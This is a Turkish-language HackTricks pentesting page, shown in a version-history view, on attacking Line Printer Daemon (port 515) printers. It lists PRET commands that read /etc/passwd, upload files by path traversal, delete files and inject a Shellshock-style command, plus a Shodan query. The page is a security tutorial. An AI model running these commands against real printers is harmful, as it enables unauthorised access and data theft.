hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

56 lines
4.2 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2024-02-10 18:14:16 +00:00
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'a göz atın!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları:
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **katkıda bulunun**.
2022-04-28 16:01:33 +00:00
</details>
2024-02-10 18:14:16 +00:00
### **LPD Protokolüne Giriş**
2024-02-10 18:14:16 +00:00
1980'lerde, **Line Printer Daemon (LPD) protokolü**, daha sonra RFC1179 aracılığıyla resmileştirilen Berkeley Unix'te geliştirildi. Bu protokol, `lpr` komutu aracılığıyla etkileşim sağlamak için 515/tcp portu üzerinde çalışır. LPD aracılığıyla yazdırma işlemi, bir **kontrol dosyası** (iş ayrıntılarını ve kullanıcıyı belirtmek için) ile birlikte bir **veri dosyası** (yazdırma bilgilerini içeren) göndermeyi içerir. Kontrol dosyası, veri dosyası için **çeşitli dosya biçimlerinin** seçilmesine izin verirken, bu dosyaların işlenmesi belirli LPD uygulamasına bağlıdır. Unix benzeri sistemler için genel olarak kabul gören bir uygulama **LPRng**'dir. Özellikle, LPD protokolü, **zararlı PostScript** veya **PJL yazdırma işleri** yürütmek için sömürülebilir.
2024-02-10 18:14:16 +00:00
### **LPD Yazıcılarla Etkileşim İçin Araçlar**
2024-02-08 21:36:35 +00:00
2024-02-10 18:14:16 +00:00
[**PRET**](https://github.com/RUB-NDS/PRET), LPD uyumlu yazıcılarla etkileşim kurmak için iki temel araç olan `lpdprint` ve `lpdtest`i tanıtır. Bu araçlar, veri yazdırma işleminden yazıcı üzerinde dosya manipülasyonuna (indirme, yükleme veya silme gibi) kadar çeşitli eylemleri mümkün kılar:
2024-02-08 21:36:35 +00:00
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
2024-02-08 21:36:35 +00:00
# To get a file from the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname get /etc/passwd
2024-02-08 21:36:35 +00:00
# To upload a file to the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname put ../../etc/passwd
2024-02-08 21:36:35 +00:00
# To remove a file from the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname rm /some/file/on/printer
2024-02-08 21:36:35 +00:00
# To execute a command injection on the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
2024-02-08 21:36:35 +00:00
# To send a mail through the printer
2020-07-28 00:00:37 +00:00
lpdtest.py hostname mail lpdtest@mailhost.local
```
2024-02-10 18:14:16 +00:00
**Yazıcı hacklemeye** ilgi duyan bireyler için kapsamlı bir kaynak burada bulunabilir: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).
2022-05-01 12:49:36 +00:00
# Shodan
2020-10-05 17:40:56 +00:00
* `port 515`
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 18:14:16 +00:00
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları:
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
* Şirketinizi HackTricks'te **reklamınızı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerimizden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
2022-04-28 16:01:33 +00:00
</details>